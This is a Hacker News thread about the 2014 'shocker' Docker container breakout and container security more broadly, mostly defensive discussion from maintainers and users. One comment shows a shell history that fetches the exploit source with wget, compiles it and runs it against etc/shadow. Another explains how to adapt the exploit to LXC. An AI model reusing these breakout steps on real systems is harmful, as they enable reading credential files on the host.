Docker container breakout?

shykes · on June 18, 2014

Hi all, I'm a maintainer of Docker. As others already indicated this doesn't work on 1.0. But it could have.

Please remember that at this time, we don't claim Docker out-of-the-box is suitable for containing untrusted programs with root privileges. So if you're thinking "pfew, good thing we upgraded to 1.0 or we were toast", you need to change your underlying configuration now. Add apparmor or selinux containment, map trust groups to separate machines, or ideally don't grant root access to the application.

Docker will soon support user namespaces, which is a great additional security layer but also not a silver bullet!

When we feel comfortable saying that Docker out-of-the-box can safely contain untrusted uid0 programs, we will say so clearly.

jacquesm · on June 18, 2014

Thank you for being so completely transparent about things like this, I wished this attitude was more common in the IT world.

bfirsh · on June 18, 2014

For more details: https://docs.docker.com/articles/security/

api · on June 18, 2014

Don't worry. This is how things get more secure. Just stay the course and whack the moles. :)

Docker is awesome by the way.

ewindisch · on June 18, 2014

Speaking of whack a mole, last month I built a docker image for the Trinity syscall fuzzer. It's a great way of finding those moles, for anyone interested in contributing to either Docker or the kernel:

https://registry.hub.docker.com/u/ewindisch/trinity/

SixSigma · on June 18, 2014

It is better to think "less insecure" than "more secure".

nate_mcfeters · on June 18, 2014

Great response on this. Nice seeing the transparency.

fabiokung · on June 18, 2014

Great response.

"..., or ideally don't grant root access to the application."

+1

simonebrunozzi · on June 18, 2014

Solomon, as always, brilliant and to the point. Keep rocking!!

sams99 · on June 19, 2014

also worth noting that you can still de-elavate the process in the container, discourse web runs under the discourse user in the container.

rhizome · on June 19, 2014

I don't use Docker, but this is just good peace-of-mind practice.

hapless · on June 18, 2014

Here is your annual reminder: Use SELinux.

Nothing with a shared kernel is going to be very secure. That's just the nature of the beast. It's why Docker supports SELinux. It's why RHEL and CentOS ship with pre-written SELinux policy for common daemons.

If you intend to have more than zero services on the system, you want SELinux.

rwmj · on June 18, 2014

Or real virtualization + SELinux + sVirt ... libvirt on RHEL/Fedora/CentOS puts the qemu process into a container too.

_3u10 · on June 18, 2014

For security yes, however, for performance / resource requirements docker is going to beat libvirt/qemu.

edwintorok · on June 18, 2014

I think of docker as a "nicer chroot", i.e. it might be nice for testing deployment of networked applications with lots of servers, where setting up a new VM for each one would be both slow and an overkill.

Is running something inside docker worse than running the same application on the host from a security pov? If not then you can consider docker just as one way of deploying an application on the host, i.e. not something for shared hosting of independent/possibly malicious applications.

rwmj · on June 18, 2014

In addition, we have repeatedly hit problems with our "mock" build system which uses a different kernel from what userland software is normally tested with. eg: [1] [2]. This stuff is going to hit Docker users sooner or later. It is also infuriatingly hard to debug.

[1] http://bugzilla.redhat.com/1062533

[2] https://bugzilla.redhat.com/563103#c8

rwmj · on June 18, 2014

Or for running anything other than Linux on the exact same kernel. Running Windows, for example, or older copies of Linux.

rdtsc · on June 19, 2014

Does it run Windows? Because libvirt/qemu does. A slow speed beats 0 speed usually? ;-)

icebraining · on June 19, 2014

A slow speed beats 0 speed usually? ;-)

Not if you're running Windows.

rdtsc · on June 19, 2014

> Not if you're running Windows.

Not if Windows puts money in the pocket

pling · on June 19, 2014

Just buy more computers. Works for us and is cheaper than VMWare ESX (the thing we replaced).

Xen would be cheaper and give us better utilisation but getting rid of VMware was a good step towards cost savings :)

growupkids · on June 19, 2014

Use grsecurity and a least privilege policy generated specifically for your exact system, and not generic policies.

darksaints · on June 18, 2014

I can't help but be skeptical about SELinux, having been written by the NSA. What would make you choose SELinux over AppArmor?

bostik · on June 18, 2014

NSA creation or not, SELinux is at its core really little more than a strict state/transition machine. It has also been vetted pretty well over the years.

The syntax for the transition rules on the other hand looks like someone disgorged C-struct assignments on paper and left them there. So while SELinux (the system) is quite easily understood, the rules used to build SELinux systems are frightening, large, and from first appearance, very, very complex.

(disclosure: I had the privilege of going through SELinux a few years ago when Nokia considered using it as part of their Maemo platform security. The engineering effort was eventually deemed too large and the benefit too little, so it was skipped as infeasible. Less than two years later, Google announced that they would be taking on the task with their SE-Android project.)

SwellJoe · on June 18, 2014

While I'm as suspicious of the NSA and their intentions as anyone (I am very actively involved in my local Restore the 4th and Cryptoparty chapters), the fact is that the code is Open Source, and has been vetted by some of the best, and most trustworthy, developers in the world (it has been in the mainline Linux kernel for over a decade).

I trust SELinux. I don't necessarily trust my understanding of SELinux...it is a complicated beast. But, I believe that when configured correctly, it is a very powerful tool.

As I understand it, SELinux covers more ground than AppArmor. I have low familiarity with AppArmor, however, so don't know enough to argue why one might choose one over the other. But, I don't have any suspicion of SELinux containing exploitable code inserted by the NSA.

zobzu · on June 18, 2014

the principles are really not that complicated really. I like this diagram of a similar implementation:

http://www.rsbac.org/_media/documentation/rsbac_handbook/arc...

zobzu · on June 18, 2014

For all its sins, SELinux code is actually pretty clear/simple. Its also nicer than AppArmor if you ask me, and it records inodes, not path, for labelling.

hapless · on June 18, 2014

SELinux is supported by the principal Linux vendor, Red Hat. As a result, on RHEL/CentOS systems, there's tons of high-quality policy pre-written for any daemon you could want to install.

Instead of writing thousands of lines of policy from scratch, even a very complex system configuration might require a one-liner tweak to the Red Hat-provided policy.

nickstinemates · on June 18, 2014

Isn't it for the NSA, but by Red Hat? May have my history mixed up.

citruspi · on June 18, 2014

I believe that the National Security Agency was the original developer, but that Red Hat is significant contributor.

mpyne · on June 18, 2014

NSA developed it and open-sourced it (much like their development of the crypto hash used for git), but Red Hat and the Linux kernel devs have pushed it the most since.

amscanne · on June 19, 2014

> Nothing with a shared kernel is going to be very secure.

SELinux is still operating in a shared kernel.

bastichelaar · on June 18, 2014

Apparently this is already fixed in Docker 1.0:

  Its fixed in docker 1.0 since CAP_DAC_READ_SEARCH is no longer available.

  Other FS-related threats to container based VMM's that have been discussed:

  - subvolume related FS operations (snapshots etc)
  - FS ioctl's that accept FS-handles as well (XFS)
  - CAP_DAC_READ_SEARCH also defeats chroot and other
    bind-mount containers (privileged LXC)
  - CAP_MKNOD might be a problem too (still available in docker 1.0) depending on the drivers available in the kernel

Source: http://seclists.org/oss-sec/2014/q2/565

kvmosx · on June 18, 2014

Confirmed not working in Docker 1.0:

  root@377a6f4ab0a4:/# history
  10  wget http://stealth.openwall.net/xSports/shocker.c  
  11  cc -Wall -std=c99 -O2 shocker.c -static
  12  apt-get install build-essential
  13  cc -Wall -std=c99 -O2 shocker.c -static
  14  cc -Wall -std=c99 -O2 shocker.c -static -Wno-unused-result
  15  ls
  16  ./shocker
  17  shocker
  18  nano a.out
  19  cat a.out
  20  ./a.out
  21  history
  root@377a6f4ab0a4:/# ./a.out
  [***] docker VMM-container breakout Po(C) 2014           
  [***]
  [***] The tea from the 90's kicks your sekurity again.     [***]
  [***] If you have pending sec consulting, I'll happily     [***]
  [***] forward to my friends who drink secury-tea too!      [***]
  <enter>
  [*] Resolving 'etc/shadow'
  [-] open_by_handle_at: Operation not permitted
  root@377a6f4ab0a4:/# uname -r
  3.14.1-tinycore64

valarauca1 · on June 18, 2014

I believe it was Theo de Raadt who once said, "Why does everything think that when it comes to writing VM/container software suddenly people gain super human programming powers and no longer make the same mistakes they make writing operating systems?" (Slightly paraphrasing).

While the issue is currently fixed in the .12 and 1.0 versions. I doubt Docker is still completely bullet proof.

mrweasel · on June 18, 2014

His words where: "You are absolutely deluded, if not stupid, if you think that a worldwide collection of software engineers who can't write operating systems or applications without security holes, can then turn around and suddenly write virtualization layers without security holes." (http://marc.info/?l=openbsd-misc&m=119318909016582)

It a wonderful quote by the way, I really like it and it mirrors my reservations regarding some peoples use of visualization.

Visualization is perfectly fine, for hardware utilization, ease of deployment and so on, just don't rely on it for additional security, because that's not what it's there for.

amscanne · on June 19, 2014

I disagree: the hardware virtualization mechanisms provide an extra level of protection. Just like the non-virtualized protection mechanisms do.

No virtualization developer is under the impression that it's magical or bulletproof.

You rely on the operating system's security mechanisms continuously, and developers work hard to fix bugs and vulnerabilities when they appear. Same goes for virtualization -- the security semantics are just different.

mrweasel · on June 19, 2014

>No virtualization developer is under the impression that it's magical or bulletproof.

Developers: No, of cause not. Some users however assume that you're automatically safe because you run Vmware/Xen/HyperV whatever.

SEJeff · on June 18, 2014

That is why Redhat contributed SELinux support for Docker so you can run with Mandatory Access Control enabled. Docker is a layer, and security is best in multiple layers. One of them will always be broken.

gtjay · on June 18, 2014

This phrasing unfairly conflates VM/hypervisor technology and containers. Containers being a pure software technology do require near superhuman ability to secure but VM/hypervisors can lean on chip-level separation.

People forget that in-chip memory protection didn't come about for security reasons, memory errors were a particularly dangerous and particularly common kind of bug and the hardware was extended to help with memory isolation. OS session ending memory errors are almost unheard of since operating systems have started fully utilizing the on-chip protection. Programmers didn't become "superhuman" at preventing these errors.

For similar reasons it's much easier for hardware-backed virtualization programmers to protect you from malicious business inside a VM than it is for OS or container programmers.

nhaehnle · on June 18, 2014

You now rely on chip designers being super-human.

The real truth is that the difficulty of containment is proportional to the interface that is available to the contained process. You don't need VM or hypervisor technology to build a virtually unbreakable container. You only need to prevent the contained process from using any syscalls at all.

Hardware only seems better at this kind of stuff because (a) it's harder to find errata in hardware and (b) the syscall interfaces of commonly used operating systems are much larger than what the hardware offers, and were developed without keeping containability in mind. It is a well known fact that tacking on security features in hindsight is problematic.

gtjay · on June 18, 2014

You don't need super-human chip designers because, as you say, "the difficulty of containment is proportional to the interface that is available". Hardware doesn't just seem better because "the syscall interfaces of commonly used operating systems are much larger than what the hardware offers", it is better. It is easier to analyse, has a more limited state-space, has more provable behavior, etc.

You can't just argue away the fact that a certain class of error has been all but eliminated by hardware-supported virtual memory. Multi-tasking as we know it today would basically be impossible without it. The reliability of "just get it right" systems like the early Macintosh isn't even comparable to, for example, a modern Linux machine that uses the chip to trap large classes of erroneous memory accesses.

Given that we have the above, a case of a class of error that programmers seemed unable to eliminate (practically) eliminated, I'm not really sure what you're arguing. Are you saying that hardware designers of the 80's were superhuman?

Okay... maybe Jay Miner...

nhaehnle · on June 19, 2014

My point is that there is no difference between software and hardware.

You don't need hardware to eliminate memory errors: software can do it as well. Two examples of this are the Singularity system that Microsoft Research built and Google's NaCl, where the system only loads code that can be verified not to access memory incorrectly.

Your claim that hardware is easier to analyze is also incorrect. Modern processors are extremely complex beasts and are not inherently simpler than software. All processors have long lists of errata. You may be mislead into thinking hardware is easier to secure because (a) those errata are less visible to userspace developers because the kernel shields you from them and (b) hardware developers invest much more resources into formal verification than software developers out of necessity (you can't just patch silicon). If software developers invested a similar amount of effort into formal verification tools, your impression would be rather different.

Again, the point is that there is no inherent distinction between software and hardware when it comes to securing systems. It is always and everywhere first a question of how you design your systems and interfaces and second a question of investment in development effort targeted at eliminating bugs.

gtjay · on June 19, 2014

"My point is that there is no difference between software and hardware."

Okay, now I see where you're coming from. Theoretically I agree. However, practically there are a number of things that make hardware different:

* Hardware has inherent "buy-in". The software systems you describe as also solving the memory access problem are basically opt-in frameworks. While you can make software frameworks hard to opt-out of (e.g. OS integration etc.) by definition... software runs on hardware...

* hardware solutions are often much more transparent. Again, your software example require a great deal of re-tooling. One of the most elegant aspects of the classic 80's memory access solution was how transparent it was.

* The ratio of software to hardware vendors has far fewer hardware vendors. Combine this with the fact that, as you point out, hardware is so expensive to retool and you create an environment where it is much more likely that a single hardware solution will be "correct enough" to enforce a constraint on software than it is the case that the majority of software will properly opt-in to a framework/code-correctly.

tshaddox · on June 19, 2014

> You now rely on chip designers being super-human.

At this point I want to ask how we're defining "super-human." What level of reliability is considered to have "super-human" requirements? There are certainly very simple and clear ways that one product produced by normal humans is much more reliable than another. For example, if you admonished someone to wear their seat belt while driving, you would scoff if they replied "well then I'm just relying on seat belt designers being super-human."

nhaehnle · on June 19, 2014

I actually agree with this. I believe that, using the right techniques, both software and hardware can be produced correctly. It's a function of their design and complexity how easy it is.

It's also worth keeping in mind that modern processors are actually extremely complex and that they do regularly have errata, even though chip designers are extremely conservative in their approach by necessity (you can't just patch silicon) and are much more thorough and disciplined in their use of formal verification tools than the vast majority of software designers.

mje__ · on June 18, 2014

Agreed. It's also a question of complexity. Xen (for example) has a significantly smaller attack surface than the linux kernel because it just has less stuff to do

mrweasel · on June 18, 2014

That hasn't stopped Xen from having bugs that have allow an attacker to escape the domU and gain access to dom0 and the hardware.

The key really is: "Don't rely on visualization for security".

Dylan16807 · on June 19, 2014

Even if you physically separate, you risk being exploited over whatever medium you have to communicate with the untrusted machine. There are no silver bullets, unless you count total isolation.

bcoates · on June 18, 2014

All user mode code has been in OS-enforced, security-bounded, per-process VMs that access each other and hardware through virtualized interfaces since forever (well, since the 90s for mainstream microcomputer OSes).

"Containers" are just user-accessible support tooling to get creative with how those interfaces work. It really should be much easier to make container software than the entire virtualization infrastructure from scratch, in the same way that it's easier to write tar than a filesystem driver.

xmlninja · on June 18, 2014

No software is ever gonna be bullet proof.

logicallee · on June 18, 2014

Except the software running a tank.

valarauca1 · on June 18, 2014

I write software that runs on tanks, its not bullet proof. Most the communication protocols just use security though obscurity. If you tell a gear box to shift form 1st to snip it'll do it, and break everything.

But when you considered air gap, and physical security surrounding it (12 inches of plate steal, 5 man team with guns, massive main gun), its pretty secure.

dhimes · on June 18, 2014

Except the software running a tank.

I write software that runs on tanks

Ha! Only on HN...

mschulkind · on June 18, 2014

I'm thinking the joke is that, since the software runs inside the tank, which itself is bulletproof, the software is literally bulletproof since you can't shoot it with a bullet.

clhodapp · on June 18, 2014

I think it was a joke... You can fire bullets at the tank and the stuff inside is fine.

valarauca1 · on June 18, 2014

It is, but vehicles including tanks and other armored things use horribly insecure serial protocols for communication. Which is no joke :\

al2o3cr · on June 18, 2014

Only for suitably small values of "bullet". :)

tshaddox · on June 19, 2014

Not unless you're defining "bullets" to exclude things like https://en.wikipedia.org/wiki/Depleted_uranium#Ammunition.

dfc · on June 18, 2014

Modern tanks have steel armor plates that are 12 inches thick?

tacticus · on June 19, 2014

i think they measure tank armour as equivalent to RHA steel

so it probably isn't steel in large quantities just as good as 300mm of RHA

mpyne · on June 18, 2014

I've used important software for submarines. OPSEC limits what I can say, but let's just say I wasn't very impressed.

gtjay · on June 18, 2014

This vulnerability is a good example of how a security bug is still a bug. That is: even if all the bad guys went away there would still be problems. This issue was fixed (as far as I can tell) pre-1.0 for non-security reasons. See this discussion: https://github.com/dotcloud/docker/issues/5661 .

Basically, docker used to have a "drop" list associated with each execdriver. By default docker kept all kernel bestowed capabilities but would explicitly drop those on the execdriver's drop list. This created issues with compatibility. If an image was prepared on a kernel that didn't have a particular capability at all and was suddenly run on one that was, weird hard to diagnose behavioral differences could emerge. So now docker drops everything by default and the execdrivers have a "keep" list. Also, there's now a check for the kernel defining a capability before trying to mess with it.

There are---of course---still some issues. For example, docker drops everything then tries to add the capability back. That won't work for some capabilities because some can't be added back once they've been renounced. Still, the situation is an interesting example of how a security bug is still a bug and is likely to bite you in some way sooner or later. See also XSS flaws that limit valid inputs.

contingencies · on June 18, 2014

Yes. I pointed it for LXC originally, filing the bug with LXC on sourceforge and later re-filing on github. Nothing to do with docker. Finally, they implemented it. This is like multiple years of timeframe we're talking about. Later I pointed it out for docker. Just sayin'. There's a lot of us contributing here, and much of the work isn't under the docker banner.

gtjay · on June 19, 2014

"There's a lot of us contributing here, and much of the work isn't under the docker banner."

Of course! If my comment could be taken as part of the mass of prose that can be read to imply otherwise, I apologize. I don't want to undermine what Docker has done with providing a packaging format, UX, and history niceness. I also don't want to undermine the years of hard work that's gone into kernel namespacing etc. that makes it all possible.

notacoward · on June 18, 2014

Just to be clear, this doesn't really seem like a problem with Docker specifically. It looks like a problem with the kernel's namespace isolation, affecting any container-based solution. Yes, that's in the PPS, but probably should be in the title.

kapilvt · on June 18, 2014

that's true to some extent, but it also has to do with which namespaces and isolation features a given container solution supports, for example lxc has seccomp syscall filtering support and user namespace support ootb which would have mitigated this attack surface to those of the unprivileged user running the container (and covering the ps on kexec). in addition lsm usage (selinux, apparmor) can also limit the attack surface area.

0xbadcafebee · on June 18, 2014

Linux capabilities are not a good security model in general. They're more suitable for sysadmins who want to do the very basic locking down of system resources to prevent users from fucking things up, or preventing programs from doing basic accidental mistakes. A MAC or RBAC implementation is a lot more robust and actually fulfills the qualifications for things like secret/top secret computing systems.

contingencies · on June 18, 2014

grsec + containers is nicer.

0xbadcafebee · on June 18, 2014

From what I recall, grsec's rbac doesn't give you the same flexibility as selinux's mac. You have to pick and choose whether you want advanced heuristics to prevent different kinds of attack, or just get really fine-grained with your system control. I prefer grsec personally, but only because i'm lazy, and it's more than likely not certified for top secret systems.

contingencies · on June 19, 2014

grsec's developer philosophy fully admits this pragmatic focus... basically, if we are too lazy to use a custom policy because policy development is painful, then essentially we are not going to use any policy and will instead remain vulnerable. grsec makes it easier, therefore it actually gets used.

I studied SEL policies in depth back in 2000 or so, but have never once deployed a custom policy. I suspect others are the same, though common daemons on common distributions recently (~last 5 years) began to have usable pre-supplied policies, unfortunately standard services are so commodified these days they're often outsourced (email, chat, web, etc.) and so the benefits of this 'too-little-too-late' development are partly mitigated in practice.

xeroxmalf · on June 18, 2014

"tested with docker 0.11"

Looks to be a few releases out past 0.11, notably 0.11.1, 0.12, and now 1.0. Can anyone confirm this works on the later versions of docker?

ewindisch · on June 18, 2014

The kernel version is just as important, if not more important. I've performed tests that have given me non-specific breakout capabilities on certain combinations of Linux and Docker. I haven't however, as is done here, reproduced and written an exploit.

As an employee of Docker, I feel it is more important to me to know if we can breakout and patch those issues than to write viable exploits for them.

I have noticed that newer kernels and Docker versions (such as 1.0) are currently more difficult to break out of than they were in earlier versions. Again, however, it's highly dependent on the pairing.

What's important to recognize here is that even with breakout potential, containers should add a useful layer of security to break out of that wouldn't otherwise exist. Containers should never remove security from your system, they should only add to it. However, although deployers may find the removal of virtual machines to weaken their security story. The "secure all the things" story would be to put Qemu in a container, then run containers inside the VM.

Otherwise, security practices are as they always have been: Don't leave setuid binaries floating around, etc.

julien421 · on June 18, 2014

Docker's answer http://blog.docker.com/2014/06/docker-container-breakout-pro...

throwaway9995 · on June 18, 2014

Relevant recent discussion on the security of containers vs full virtualization: https://news.ycombinator.com/item?id=7834338

floatboth · on June 18, 2014

Now try breaking out of a FreeBSD jail ;-)

nisa · on June 18, 2014

like this? http://freebsd.1045724.n5.nabble.com/Thoughts-on-jail-privil...

profquail · on June 18, 2014

That's dated Jan 15, 2009. Are there any newer exploits for breaking out of jails on recent versions of FreeBSD? OR breaking out of a Bhyve VM?

floatboth · on June 20, 2014

And that's not even an exploit, that's the sysadmin doing it wrong: "If the host system and the jail share the `john' user and you are sharing `/usr/local' as read-write between the host and the jail, then ``you are doing it wrong!''."

mkent · on June 18, 2014

Confirmed this works on lxc 0.7.5-3ubuntu69 (ships with Ubuntu 12.04 lts). Just change "/.dockerinit" to any file within a bind mount and run it.

To fix this you can shutdown the container, edit the config in /var/lib/lxc/<name>/config and add dac_read_search to lxc.cap.drop. Voila.

  [*] Resolving 'etc/shadow'
  [-] open_by_handle_at: Operation not permitted

gabrtv · on June 18, 2014

Docker image to test if your host is vulnerable to this particular open_by_handle_at() container breakout: https://registry.hub.docker.com/u/gabrtv/shocker/

Remember to always audit the source code before running something like this. Origin repo is here: https://github.com/gabrtv/shocker

jrockway · on June 18, 2014

> "The tea from the 90's kicks your sekurity again. If you have pending sec consulting, I'll happily forward to my friends who drink secury-tea too!"

Uh, what?

eugeneionesco · on June 18, 2014

stealth is a legend of the '90s

http://en.wikipedia.org/wiki/TESO

contingencies · on June 18, 2014

Never really got talking but they sent me some friendly warez when I released an ARP-based remote OS detection script in like 1999. As I recall they were all Germanic. Doubt there's any 'reach out' from groups today, too much profit/loss going on...

jhardcastle · on June 18, 2014

With a technology used in production in a lot of places, does responsible disclosure apply here? Did the author (OP?) notify Docker and/or the Linux kernel team before distributing this for public consumption?

zorked · on June 18, 2014

While the author called the exploit "shocker" I don't think anybody is shocked by it. There are likely many other ways to break out of Docker. And while I assume the Docker (and kernel!) people are closing them as they come along, I don't think anyone is claiming Docker is unescapable so it's not a surprise if it is.

zobzu · on June 18, 2014

I think he might have been sarcastic

nickstinemates · on June 18, 2014

See: http://www.docker.com/resources/security/

It has been used effectively in the past! I'd encourage anyone who is researching security and Docker to send new information here.

Thanks!

BillinghamJ · on June 18, 2014

A fix has been released already - Docker 1.0. Thus, it shouldn't really be an issue.